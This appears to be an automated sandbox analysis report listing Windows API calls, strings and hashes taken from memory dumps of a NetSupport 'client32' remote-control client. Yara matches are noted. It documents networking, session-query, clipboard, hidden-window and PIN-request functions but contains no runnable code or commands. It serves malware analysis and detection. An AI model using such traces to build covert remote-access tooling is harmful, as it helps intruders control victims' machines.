                                                                                                • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                                • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                                • GetDC.USER32(?), ref: 11025085
                                                                                                • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                                • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                                • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                                • SelectObject.GDI32(?,?), ref: 110250C7
                                                                                                • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                                • SetCaretPos.USER32(?,?), ref: 11025111
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                                                • String ID:
                                                                                                • API String ID: 4100900918-3916222277
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 1101F0FE
                                                                                                • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                                  • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                                  • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                                                • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                                                • _memset.LIBCMT ref: 1101F1CF
                                                                                                • GetMenuItemInfoA.USER32 ref: 1101F20C
                                                                                                • __strdup.LIBCMT ref: 1101F221
                                                                                                • SetMenuItemInfoA.USER32 ref: 1101F279
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                                                • String ID: 0$MakeOwnerDraw
                                                                                                • API String ID: 1249465458-1190305232
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 69D009A6
                                                                                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 69D009C3
                                                                                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 69D009CD
                                                                                                • GetProcAddress.KERNEL32(00000000,socket), ref: 69D009DB
                                                                                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 69D009E9
                                                                                                • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 69D009F7
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 69D00A6C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                                                • API String ID: 2449869053-2279908372
                                                                                                • Opcode ID: 75b62b205d1ae481ec6c6422bcb8fbd828c8f842d4d13c63c1344cc93f91a523
                                                                                                • Instruction ID: 664f504497cd8b4158195989bd6b3aa3471ff5d61ed171537486c9196dfd83d9
                                                                                                • Opcode Fuzzy Hash: 75b62b205d1ae481ec6c6422bcb8fbd828c8f842d4d13c63c1344cc93f91a523
                                                                                                • Instruction Fuzzy Hash: DD318471B01218ABEB149F74CD59FEEB7B8EF86714F0041A9FA09A7280DA705E45CF91
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 11131457
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastShowWindow
                                                                                                • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                                • API String ID: 3252650109-4091810678
                                                                                                • Opcode ID: 087aa81ea763b872e44e1da826959f3d6e4a579116f4b694f75f8a4ea183d17b
                                                                                                • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                                                • Opcode Fuzzy Hash: 087aa81ea763b872e44e1da826959f3d6e4a579116f4b694f75f8a4ea183d17b
                                                                                                • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110F732D
                                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7372
                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0), ref: 110F73C3
                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F73FD
                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                                                • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                                • API String ID: 2188719708-2019804778
                                                                                                • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                                • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                                                • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                                • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7BE0: _memset.LIBCMT ref: 69CF7BFF
                                                                                                  • Part of subcall function 69CF7BE0: _strncpy.LIBCMT ref: 69CF7C0B
                                                                                                • __wcstoui64.LIBCMT ref: 69CE622B
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,-000397EB,?,?,69CF2C4D), ref: 69CE62AF
                                                                                                • _strncpy.LIBCMT ref: 69CE62E5
                                                                                                • _free.LIBCMT ref: 69CE62FB
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,?,?,?,69CF2C4D), ref: 69CE631D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection_strncpy$EnterLeave__wcstoui64_free_memset
                                                                                                • String ID: 1.0$CLIENT_NAME$CONNECTION_ID$FAILED_REASON$PROTOCOL_VER$RESULT$SERVER_VERSION
                                                                                                • API String ID: 2226502904-1282845728
                                                                                                • Opcode ID: afae681e7b361fdb9c80db75d552df75547f1281fb0a007b6b035cd9b88f2f93
                                                                                                • Instruction ID: 40cbe1402197b1d478f1441846b5c085318929457b2785f46284a68f70f94ae0
                                                                                                • Opcode Fuzzy Hash: afae681e7b361fdb9c80db75d552df75547f1281fb0a007b6b035cd9b88f2f93
                                                                                                • Instruction Fuzzy Hash: C14111F9D006016BDF10DF64EC80AAE7B74EF51248F10D175EA0A9B641F335DA5687E2
                                                                                                APIs
                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                                  • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                                  • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                                                • wsprintfA.USER32 ref: 1103F5D1
                                                                                                • GetSystemMenu.USER32 ref: 1103F5F6
                                                                                                • EnableMenuItem.USER32 ref: 1103F604
                                                                                                • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                                                • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                                                • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 1300213680-78349004
                                                                                                • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                                • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                                                • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                                • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library_memmove$AddressFreeLoadProc_free_malloc_memset
                                                                                                • String ID: GetAdaptersInfo$cbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH$iphlpapi.dll$macaddr.cpp
                                                                                                • API String ID: 3275914093-1155488092
                                                                                                • Opcode ID: 77d297f33b5c506f22c3bf732d10ab4dc6308fb22cc3970cc09d48caafc54fbb
                                                                                                • Instruction ID: 0c96e9c5597ba62d4276379f6b127ad101ebe460f4b674406c6547f6066b8fe8
                                                                                                • Opcode Fuzzy Hash: 77d297f33b5c506f22c3bf732d10ab4dc6308fb22cc3970cc09d48caafc54fbb
                                                                                                • Instruction Fuzzy Hash: 01319EBAE00204ABDB40DFA4ED90D9E7778AF44358F008475FA18E7640F730EA46D7A0
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 1105F251
                                                                                                • wsprintfA.USER32 ref: 1105F265
                                                                                                  • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000), ref: 110ED59B
                                                                                                  • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?), ref: 110ED53C
                                                                                                • wsprintfA.USER32 ref: 1105F5D6
                                                                                                  • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32 ref: 110ED1CB
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                                                • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                • API String ID: 273891520-33395967
                                                                                                • Opcode ID: fb8d40915478573fc0a9589c73963390b11639aa97460e6bf973478304e2651b
                                                                                                • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                                                • Opcode Fuzzy Hash: fb8d40915478573fc0a9589c73963390b11639aa97460e6bf973478304e2651b
                                                                                                • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf
                                                                                                • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                • API String ID: 2111968516-2092292787
                                                                                                • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                                • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • _memset.LIBCMT ref: 69CF141D
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1678
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF16C8
                                                                                                • std::exception::exception.LIBCMT ref: 69CF1740
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF175B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection_memset$EnterException@8LeaveThrow_mallocstd::exception::exceptionwsprintf
                                                                                                • String ID: END_REC$MORE$RESULT$b
                                                                                                • API String ID: 285166177-3141901015
                                                                                                • Opcode ID: a4972ed96b02c625cdc9dae119f17adcbd009fbb07427316a9e46fb81f91d26a
                                                                                                • Instruction ID: b043ca4cd1de68deac6c2ef2611ab5b513053c4c5c2111a562d6c40f53d2247c
                                                                                                • Opcode Fuzzy Hash: a4972ed96b02c625cdc9dae119f17adcbd009fbb07427316a9e46fb81f91d26a
                                                                                                • Instruction Fuzzy Hash: 9FB16BF5C012599BDF50DFA4EC80AAEB7B4FF05308F40557AE50AA6640F7345B4ACB62
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd
                                                                                                • String ID: MOC$RCC$csm$csm
                                                                                                • API String ID: 3384420010-1441736206
                                                                                                • Opcode ID: 2948d543296bb9c706df1e9ba1aa1137578febb3c3cc4c93cd90a746d2b5b3f7
                                                                                                • Instruction ID: 810de0c41e6901a488a868b9da3cb86bcc0b37e5ce2ab70a6d9f817ab63cfa95
                                                                                                • Opcode Fuzzy Hash: 2948d543296bb9c706df1e9ba1aa1137578febb3c3cc4c93cd90a746d2b5b3f7
                                                                                                • Instruction Fuzzy Hash: 47319135500308CFCB20CF64C5A879D77F8BF50326F558979D85987A11E734D984CBA2
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 69CEC3C8
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEC412
                                                                                                • _free.LIBCMT ref: 69CEC458
                                                                                                • _free.LIBCMT ref: 69CEC48C
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: AT=%d$CAP=%s$DEP=%s$FMASK=%d$MAX=%d$ORO=%s$ORU=%s
                                                                                                • API String ID: 3180605519-3721514808
                                                                                                • Opcode ID: c14fab5cc086ea6027940ae77e5d3d62b7c0d5a88f664f00b29a542212e501a4
                                                                                                • Instruction ID: f743af1b0c4992eeb1a09523669e732dd73d149343f09584914bc0169e148ee3
                                                                                                • Opcode Fuzzy Hash: c14fab5cc086ea6027940ae77e5d3d62b7c0d5a88f664f00b29a542212e501a4
                                                                                                • Instruction Fuzzy Hash: ED317EB95401087BEB02DF21EC80FBE775CAF05219F44D054F92A97A45F735EA1487B5
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32(986DAFD2,00000000,0000000A,?), ref: 110695BD
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
                                                                                                • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3,000000FF), ref: 11069621
                                                                                                • wsprintfA.USER32 ref: 11069651
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7
                                                                                                Strings
                                                                                                • ..\ctl32\Connect.cpp, xrefs: 11069661
                                                                                                • CloseTransports slept for %u ms, xrefs: 11069630
                                                                                                • idata->n_connections=%d, xrefs: 1106964B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
                                                                                                • String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
                                                                                                • API String ID: 2285713701-3017572385
                                                                                                • Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                                • Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
                                                                                                • Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                                • Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 69CF9136
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 69CF913D
                                                                                                • GetCurrentProcessId.KERNEL32(00000000), ref: 69CF9153
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 69CF9171
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 69CF917B
                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 69CF918E
                                                                                                • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),69D2A2F0,00000004,?), ref: 69CF91AD
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69CF91D4
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69CF91DB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                                                                • String ID: ProcessIdToSessionId$kernel32.dll
                                                                                                • API String ID: 2536908267-3889420803
                                                                                                • Opcode ID: 3da4357ccd313d3b60d9b02e896c6817451a70d7abdeebbae404fd3f67d56407
                                                                                                • Instruction ID: b321aa6da0e97921a4627b97f0ec49bacf07db25e7535cf51883e6fec612e5f0
                                                                                                • Opcode Fuzzy Hash: 3da4357ccd313d3b60d9b02e896c6817451a70d7abdeebbae404fd3f67d56407
                                                                                                • Instruction Fuzzy Hash: E3214F75A04245ABFF509FA5DE08F9A7BBCFF46754F008175EA04E3640FB70D9058A60
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                                • String ID:
                                                                                                • API String ID: 4121194973-0
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF5E36
                                                                                                  • Part of subcall function 69CF33A0: wsprintfA.USER32 ref: 69CF34FD
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __vswprintf_memsetwsprintf
                                                                                                • String ID: %02X%02X%02X%02X%02X%02X$0x0x0x0$445817$>???.???.???.???$CLIENT_NAME=%s$CMD=CLIENT_PIN_REQUEST$CMD=CONTROL_PIN_REQUEST$PINserver
                                                                                                • API String ID: 518437271-1007204944
                                                                                                APIs
                                                                                                • CountClipboardFormats.USER32 ref: 11033091
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                                • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                                                • GetLastError.KERNEL32 ref: 110331BF
                                                                                                • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                                                • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                                                • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                                                • API String ID: 3210887762-597690070
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(111EE294,986DAFD2,?,?,?,?,00000000,11181BDE), ref: 110535C4
                                                                                                • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • std::exception::exception.LIBCMT ref: 11053635
                                                                                                • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                                                • GetTickCount.KERNEL32(?,00000000,11181BDE), ref: 11053660
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                                                • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                                                • API String ID: 2238969640-1197860701
                                                                                                APIs
